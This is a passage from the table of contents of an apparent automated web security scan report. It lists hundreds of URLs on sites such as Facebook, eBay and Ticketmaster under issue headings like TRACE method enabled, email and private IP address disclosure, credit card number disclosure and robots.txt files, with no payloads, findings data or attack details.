21.5. http://bcp.crwdcntrl.net/px

21.6. http://bing.fansnap.com/checkout/index/415814268

21.7. http://bing.fansnap.com/checkout/index/418563179

21.8. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

21.9. http://cc.bingj.com/cache.aspx

21.10. http://developers.facebook.com/

21.11. http://digg.com/submit

21.12. http://feeds.feedburner.com/netsparker

21.13. http://googleads.g.doubleclick.net/pagead/ads

21.14. http://investor.realnetworks.com/stockquote.cfm

21.15. http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js

21.16. http://majornelson.com/

21.17. http://mobile.ebay.com/

21.18. http://mobile.ebay.com/mobileweb/ebay

21.19. http://mobileweb.ebay.com/

21.20. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

21.21. http://realnetworks.com/

21.22. http://realnetworks.com/about-us/affiliate.aspx

21.23. http://realnetworks.com/contact-us.aspx

21.24. http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx

21.25. http://realnetworks.com/pressroom/index.aspx

21.26. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

21.27. http://sharethis.com/account/signin-widget

21.28. https://signin.ebay.com/ws/eBayISAPI.dll

21.29. http://support.gamehouse.com/

21.30. http://support.gamehouse.com/app/answers/detail/a_id/861/

21.31. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

21.32. http://support.gamehouse.com/app/contact

21.33. http://support.microsoft.com/contactus/

21.34. http://umfcluj.ro/

21.35. http://umfcluj.ro/Detaliu.aspx

21.36. http://umfcluj.ro/contact.aspx

21.37. http://umfcluj.ro/en

21.38. http://umfcluj.ro/fr

21.39. http://umfcluj.ro/lista.aspx

21.40. http://umfcluj.ro/search.aspx

21.41. http://umfcluj.ro/sitemap.aspx

21.42. http://www.adminitrack.com/

21.43. http://www.atlassian.com/en/resources/wac/js/globalNav.js

21.44. http://www.atlassian.com/software/jira/pricing.jsp

21.45. http://www.axosoft.com/

21.46. http://www.axosoft.com/lp/ga/bug-tracking-software/

21.47. http://www.axosoft.com/ontime

21.48. http://www.axosoft.com/ontime/bug_tracking

21.49. http://www.bnymellonam.com/core/hub/am_site_selector.html

21.50. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

21.51. http://www.discoverbing.com/

21.52. http://www.facebook.com/advertising/

21.53. http://www.facebook.com/ajax/intl/language_dialog.php

21.54. http://www.facebook.com/badges/

21.55. http://www.facebook.com/careers/

21.56. http://www.facebook.com/directory/pages/

21.57. http://www.facebook.com/directory/people/

21.58. http://www.facebook.com/facebook

21.59. http://www.facebook.com/find-friends

21.60. http://www.facebook.com/help/

21.61. http://www.facebook.com/mobile/

21.62. http://www.facebook.com/pages/create.php

21.63. http://www.facebook.com/plugins/activity.php

21.64. http://www.facebook.com/plugins/likebox.php

21.65. http://www.facebook.com/privacy/explanation.php

21.66. http://www.facebook.com/r.php

21.67. http://www.facebook.com/terms.php

21.68. http://www.factset.com/

21.69. http://www.factset.com/events

21.70. http://www.factset.com/images/searchInputBg.gif

21.71. http://www.factset.com/products/im

21.72. http://www.factset.com/products/im/img/im/title_1_2.png

21.73. http://www.factset.com/products/privateequity

21.74. http://www.fansnap.com/

21.75. http://www.fansnap.com/developers

21.76. http://www.fastteks.com/TechSolutions/News.aspx

21.77. http://www.gamestop.com/

21.78. http://www.googlelabs.com/

21.79. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

21.80. http://www.intelex.com/landing/~/script/highslide/highslide.css

21.81. http://www.livedrive.com/

21.82. http://www.livedrive.com/ForHome/ProSuite

21.83. http://www.livedrive.com/SignupToLivedrive

21.84. http://www.mavitunasecurity.com/

21.85. http://www.mavitunasecurity.com/blog/

21.86. http://www.myspace.com/auth/loginform

21.87. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

21.88. http://www.numarasoftware.com/welcome/service_desk.aspx

21.89. http://www.seapine.com/ttpro.html

21.90. http://www.stubhub.com/

21.91. http://www.stumbleupon.com/submit

21.92. http://www.techexcel.com/products/devsuite/devteststudio.html

21.93. http://www.versionone.com/Product/

22. TRACE method is enabled

22.1. http://ads.as4x.tmcs.ticketmaster.com/

22.2. http://bh.contextweb.com/

22.3. http://bing.fansnap.com/

22.4. http://blog.linode.com/

22.5. http://cache.specificmedia.com/

22.6. http://cdn1.diggstatic.com/

22.7. http://cheetah.vizu.com/

22.8. http://clk.specificclick.net/

22.9. http://digg.com/

22.10. http://matcher-apx.bidder7.mookie1.com/

22.11. http://matcher-cwb.bidder7.mookie1.com/

22.12. http://matcher.bidder7.mookie1.com/

22.13. http://matcher.bidder8.mookie1.com/

22.14. http://puma.vizu.com/

22.15. http://rmedia.boston.com/

22.16. http://rt.legolas-media.com/

22.17. http://sharethis.com/

22.18. http://t.mookie1.com/

22.19. http://widgets.outbrain.com/

22.20. http://www.seapine.com/

22.21. http://www.stumbleupon.com/

23. Email addresses disclosed

23.1. http://ads.msn.com/library/dapmsn.js

23.2. http://az10143.vo.msecnd.net/sitecore/dbing/media/Images/homepage/rr-partypeople.jpg

23.3. http://b3.mookie1.com/RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js

23.4. http://cache.boston.com/universal/js/bcom_hp_scripts.js

23.5. http://cache.boston.com/universal/js/twitterwidget.js

23.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.7. http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.8. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.9. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

23.10. http://feedburner.google.com/fb/feed-styles/bf30.js

23.11. http://i2.onlinehelp.microsoft.com/Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js

23.12. https://login.live.com/login.srf

23.13. http://majornelson.com/wp-content/themes/roundhouse/style.css

23.14. http://media.gamehouse.com/4/js/s_code_test.js

23.15. http://media.ticketmaster.com/en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js

23.16. http://realnetworks.com/WorkArea/java/ektron.js

23.17. http://realnetworks.com/pressroom/index.aspx

23.18. http://service.real.com/international/br/

23.19. http://sharethis.com/account/signin-widget

23.20. http://sharethis.com/ext/adapter/ext/ext-base.js

23.21. http://sharethis.com/ext/ext-all.js

23.22. http://sharethis.com/ext/resources/css/ext-all.css

23.23. http://sharethis.com/privacy

23.24. http://sharethis.com/register

23.25. http://umfcluj.ro/js/jquery.emptyOnFocus.js

23.26. http://umfcluj.ro/js/jquery.hoverIntent.js

23.27. http://umfcluj.ro/lista.aspx

23.28. http://umfcluj.ro/lista.aspx

23.29. http://umfcluj.ro/lista.aspx

23.30. http://umfcluj.ro/lista.aspx

23.31. http://umfcluj.ro/lista.aspx

23.32. http://umfcluj.ro/lista.aspx

23.33. http://umfcluj.ro/lista.aspx

23.34. http://umfcluj.ro/lista.aspx

23.35. http://w.sharethis.com/button/buttons.js

23.36. http://widgets.outbrain.com/outbrainWidget.js

23.37. http://widgets.twimg.com/j/2/widget-2.2.css

23.38. http://www.bnymellon.com/foresight/index.html

23.39. http://www.bnymellon.com/foresight/richardhoey.html

23.40. http://www.bnymellon.com/wealthmanagement/index.html

23.41. http://www.factset.com/

23.42. http://www.factset.com/events

23.43. http://www.factset.com/files/jquery/nifty/niftycube.js

23.44. http://www.factset.com/images/searchInputBg.gif

23.45. http://www.factset.com/products/im

23.46. http://www.factset.com/products/im/img/im/title_1_2.png

23.47. http://www.factset.com/products/privateequity

23.48. http://www.fansnap.com/

23.49. http://www.fansnap.com/developers

23.50. http://www.fastteks.com/TechSolutions/About-Us.aspx

23.51. http://www.fastteks.com/TechSolutions/Contact-Us.aspx

23.52. http://www.fastteks.com/TechSolutions/Default.aspx

23.53. http://www.fastteks.com/TechSolutions/News.aspx

23.54. http://www.fastteks.com/TechSolutions/Services.aspx

23.55. http://www.fastteks.com/techsolutions/

23.56. http://www.gamestop.com/

23.57. http://www.googlelabs.com/

23.58. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

23.59. http://www.intelex.com/landing/~/script/highslide/highslide.css

23.60. http://www.linode.com/faq.cfm

23.61. http://www.livedrive.com/Scripts/PreloadImages.js

23.62. http://www.livedrive.com/Scripts/typeface.js

23.63. http://www.mavitunasecurity.com/

23.64. http://www.mookie1.com/contact.php

23.65. http://www.netlogiq.ro/js/jquery.emptyOnFocus.js

23.66. http://www.netlogiq.ro/js/jquery.hoverIntent.js

23.67. http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js

23.68. http://www.nne.aaa.com/style%20library/js/tracking/sitecatalyst_scode.js

23.69. http://www.rallydev.com/js/jquery.colorbox-min.js

23.70. http://www.stubhub.com/

23.71. http://www.stubhub.com/content/getPromoContent

23.72. http://www.ticketmaster.com/event/000043582C516D43

23.73. http://www.versionone.com/LandingPgTemp/js/global.js

23.74. http://www.versionone.com/js/global.js

23.75. http://www.versionone.com/js/s_code.js

24. Private IP addresses disclosed

24.1. http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js

24.2. http://developers.facebook.com/

24.3. http://developers.facebook.com/favicon.ico

24.4. http://developers.facebook.com/images/connect_showcase/platform_showcase_gallery_b.png

24.5. http://developers.facebook.com/images/devsite/icn_facebook_apps.png

24.6. http://developers.facebook.com/images/devsite/icn_mobile.png

24.7. http://developers.facebook.com/images/devsite/icn_open_source.png

24.8. http://digg.com/ajax/tooltip/submit

24.9. http://digg.com/submit

24.10. http://external.ak.fbcdn.net/safe_image.php

24.11. http://external.ak.fbcdn.net/safe_image.php

24.12. http://external.ak.fbcdn.net/safe_image.php

24.13. http://external.ak.fbcdn.net/safe_image.php

24.14. http://platform.ak.fbcdn.net/www/app_full_proxy.php

24.15. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

24.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.17. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.18. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css

24.19. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css

24.20. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css

24.21. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css

24.22. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css

24.23. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css

24.24. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css

24.25. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css

24.26. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

24.27. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css

24.28. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/ts_55XkdiUP.js

24.29. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js

24.30. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css

24.31. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js

24.32. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/-r69fEK9JXo.js

24.33. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css

24.34. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css

24.35. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css

24.36. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css

24.37. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css

24.38. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css

24.39. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css

24.40. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css

24.41. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css

24.42. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/2oQd79CdXv7.css

24.43. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

24.44. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css

24.45. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css

24.46. http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css

24.47. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css

24.48. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css

24.49. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/y_PXXLWHa9g.js

24.50. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css

24.51. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css

24.52. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css

24.53. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css

24.54. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css

24.55. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css

24.56. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css

24.57. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css

24.58. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css

24.59. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css

24.60. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css

24.61. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css

24.62. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css

24.63. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css

24.64. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css

24.65. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css

24.66. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css

24.67. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css

24.68. http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css

24.69. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css

24.70. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/xrEeXUiCo9E.js

24.71. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css

24.72. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css

24.73. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css

24.74. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css

24.75. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css

24.76. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css

24.77. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css

24.78. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css

24.79. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css

24.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css

24.81. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css

24.82. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css

24.83. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/7mqITnKP1S_.css

24.84. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css

24.85. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css

24.86. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/cwpj7clVond.css

24.87. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/fM3yrUPcjJi.js

24.88. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css

24.89. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css

24.90. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css

24.91. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/sz5xc1yg7bR.js

24.92. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/7lH5BC-8hlS.css

24.93. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/FmBZt5UgnLN.js

24.94. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css

24.95. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css

24.96. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css

24.97. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css

24.98. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css

24.99. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css

24.100. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js

24.101. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css

24.102. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css

24.103. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css

24.104. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IOfrcReUvwR.js

24.105. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css

24.106. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/nfbcyOQNzob.js

24.107. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css

24.108. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css

24.109. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css

24.110. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css

24.111. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/aZS2cs-mE5h.css

24.112. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/kYoCeJwtttA.js

24.113. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css

24.114. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/LYx7X5wadgo.js

24.115. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css

24.116. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css

24.117. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css

24.118. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/0xUg4sx8bB2.js

24.119. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css

24.120. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/gdzYpes5-k7.js

24.121. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css

24.122. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css

24.123. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css

24.124. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css

24.125. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/clJdoaAA7xi.js

24.126. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css

24.127. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css

24.128. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css

24.129. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css

24.130. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png

24.131. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png

24.132. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/v3dJrMQoPk1.png

24.133. http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png

24.134. http://static.ak.fbcdn.net/rsrc.php/v1/z4/r/EAbydW1M_XR.png

24.135. http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif

24.136. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png

24.137. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png

24.138. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png

24.139. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

24.140. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/TwAHgQi2ZPB.png

24.141. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif

24.142. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png

24.143. http://static.ak.fbcdn.net/rsrc.php/v1/zE/r/eh0bmn9m_mm.png

24.144. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png

24.145. http://static.ak.fbcdn.net/rsrc.php/v1/zI/r/llncLdVc0JC.gif

24.146. http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif

24.147. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/7ngmhwdsni2.png

24.148. http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png

24.149. http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif

24.150. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png

24.151. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/ccgKJX0yQZC.png

24.152. http://static.ak.fbcdn.net/rsrc.php/v1/zT/r/dDagbUnwf34.png

24.153. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/gLuMARNlxxj.png

24.154. http://static.ak.fbcdn.net/rsrc.php/v1/zV/r/-pf2bdz3vEg.gif

24.155. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/1gBp2bDGEuh.gif

24.156. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png

24.157. http://static.ak.fbcdn.net/rsrc.php/v1/z_/r/2Oin6nHA4Mx.png

24.158. http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/3LyZkLVshsc.gif

24.159. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif

24.160. http://static.ak.fbcdn.net/rsrc.php/v1/zh/r/HNHvoJkgN6x.png

24.161. http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png

24.162. http://static.ak.fbcdn.net/rsrc.php/v1/zl/r/6N9FQPpTHCy.png

24.163. http://static.ak.fbcdn.net/rsrc.php/v1/zp/r/-dio0u9UIlC.png

24.164. http://static.ak.fbcdn.net/rsrc.php/v1/zr/r/XXVvDYAks_i.png

24.165. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/YoX0fw76s5z.gif

24.166. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/fzdZPrLUwxB.png

24.167. http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif

24.168. http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/cDpiVvg8Q0u.png

24.169. http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png

24.170. http://vimeo.com/moogaloop.swf

24.171. http://vimeo.com/moogaloop.swf

24.172. http://vimeo.com/moogaloop.swf

24.173. http://vimeo.com/moogaloop.swf

24.174. http://www.facebook.com/advertising/

24.175. http://www.facebook.com/ajax/connect/connect_widget.php

24.176. http://www.facebook.com/ajax/connect/connect_widget.php

24.177. http://www.facebook.com/ajax/intl/language_dialog.php

24.178. http://www.facebook.com/ajax/prefetch.php

24.179. http://www.facebook.com/ajax/prefetch.php

24.180. http://www.facebook.com/badges

24.181. http://www.facebook.com/badges/

24.182. http://www.facebook.com/campaign/landing.php

24.183. http://www.facebook.com/campaign/landing.php

24.184. http://www.facebook.com/captcha/tfbimage.php

24.185. http://www.facebook.com/careers/

24.186. http://www.facebook.com/directory/pages/

24.187. http://www.facebook.com/directory/people/

24.188. http://www.facebook.com/extern/login_status.php

24.189. http://www.facebook.com/extern/login_status.php

24.190. http://www.facebook.com/extern/login_status.php

24.191. http://www.facebook.com/extern/login_status.php

24.192. http://www.facebook.com/extern/login_status.php

24.193. http://www.facebook.com/extern/login_status.php

24.194. http://www.facebook.com/extern/login_status.php

24.195. http://www.facebook.com/extern/login_status.php

24.196. http://www.facebook.com/extern/login_status.php

24.197. http://www.facebook.com/extern/login_status.php

24.198. http://www.facebook.com/extern/login_status.php

24.199. http://www.facebook.com/extern/login_status.php

24.200. http://www.facebook.com/extern/login_status.php

24.201. http://www.facebook.com/extern/login_status.php

24.202. http://www.facebook.com/extern/login_status.php

24.203. http://www.facebook.com/extern/login_status.php

24.204. http://www.facebook.com/extern/login_status.php

24.205. http://www.facebook.com/extern/login_status.php

24.206. http://www.facebook.com/extern/login_status.php

24.207. http://www.facebook.com/extern/login_status.php

24.208. http://www.facebook.com/extern/login_status.php

24.209. http://www.facebook.com/extern/login_status.php

24.210. http://www.facebook.com/extern/login_status.php

24.211. http://www.facebook.com/extern/login_status.php

24.212. http://www.facebook.com/extern/login_status.php

24.213. http://www.facebook.com/extern/login_status.php

24.214. http://www.facebook.com/facebook

24.215. http://www.facebook.com/favicon.ico

24.216. http://www.facebook.com/find-friends

24.217. http://www.facebook.com/help/

24.218. http://www.facebook.com/images/contact_importer/login_button/yahoo.png

24.219. http://www.facebook.com/images/loaders/indicator_black.gif

24.220. http://www.facebook.com/images/registration_graphic.png

24.221. http://www.facebook.com/mobile

24.222. http://www.facebook.com/mobile/

24.223. http://www.facebook.com/pages/create.php

24.224. http://www.facebook.com/plugins/activity.php

24.225. http://www.facebook.com/plugins/like.php

24.226. http://www.facebook.com/plugins/like.php

24.227. http://www.facebook.com/plugins/like.php

24.228. http://www.facebook.com/plugins/like.php

24.229. http://www.facebook.com/plugins/like.php

24.230. http://www.facebook.com/plugins/like.php

24.231. http://www.facebook.com/plugins/like.php

24.232. http://www.facebook.com/plugins/like.php

24.233. http://www.facebook.com/plugins/like.php

24.234. http://www.facebook.com/plugins/like.php

24.235. http://www.facebook.com/plugins/like.php

24.236. http://www.facebook.com/plugins/like.php

24.237. http://www.facebook.com/plugins/like.php

24.238. http://www.facebook.com/plugins/like.php

24.239. http://www.facebook.com/plugins/like.php

24.240. http://www.facebook.com/plugins/like.php

24.241. http://www.facebook.com/plugins/like.php

24.242. http://www.facebook.com/plugins/like.php

24.243. http://www.facebook.com/plugins/like.php

24.244. http://www.facebook.com/plugins/like.php

24.245. http://www.facebook.com/plugins/likebox.php

24.246. http://www.facebook.com/plugins/likebox.php

24.247. http://www.facebook.com/plugins/likebox.php

24.248. http://www.facebook.com/privacy/explanation.php

24.249. http://www.facebook.com/r.php

24.250. http://www.facebook.com/r.php

24.251. http://www.facebook.com/terms.php

24.252. http://www.gamestop.com/

24.253. http://www.google.com/sdch/StnTz5pY.dct

25. Credit card numbers disclosed

25.1. http://www.facebook.com/directory/pages/

25.2. http://www.facebook.com/directory/people/

25.3. http://www.livedrive.com/Scripts/colaborate-medium_regular.typeface.js

26. Robots.txt file

26.1. http://0.gravatar.com/avatar/a9253565cd7a0a613c1147db0e66e6f0

26.2. http://040-eex-147.mktoresp.com/webevents/visitWebPage

26.3. http://1.gravatar.com/avatar/16984fd773fe4e40c9cb0e60ff81e600

26.4. http://624-vqc-743.mktoresp.com/webevents/visitWebPage

26.5. http://a.netmng.com/hic/

26.6. http://a.ok.facebook.com/cm/bk/9998-58063-3840-0

26.7. http://a.tribalfusion.com/j.ad

26.8. http://a1.bing4.com/imagenewsfetcher.aspx

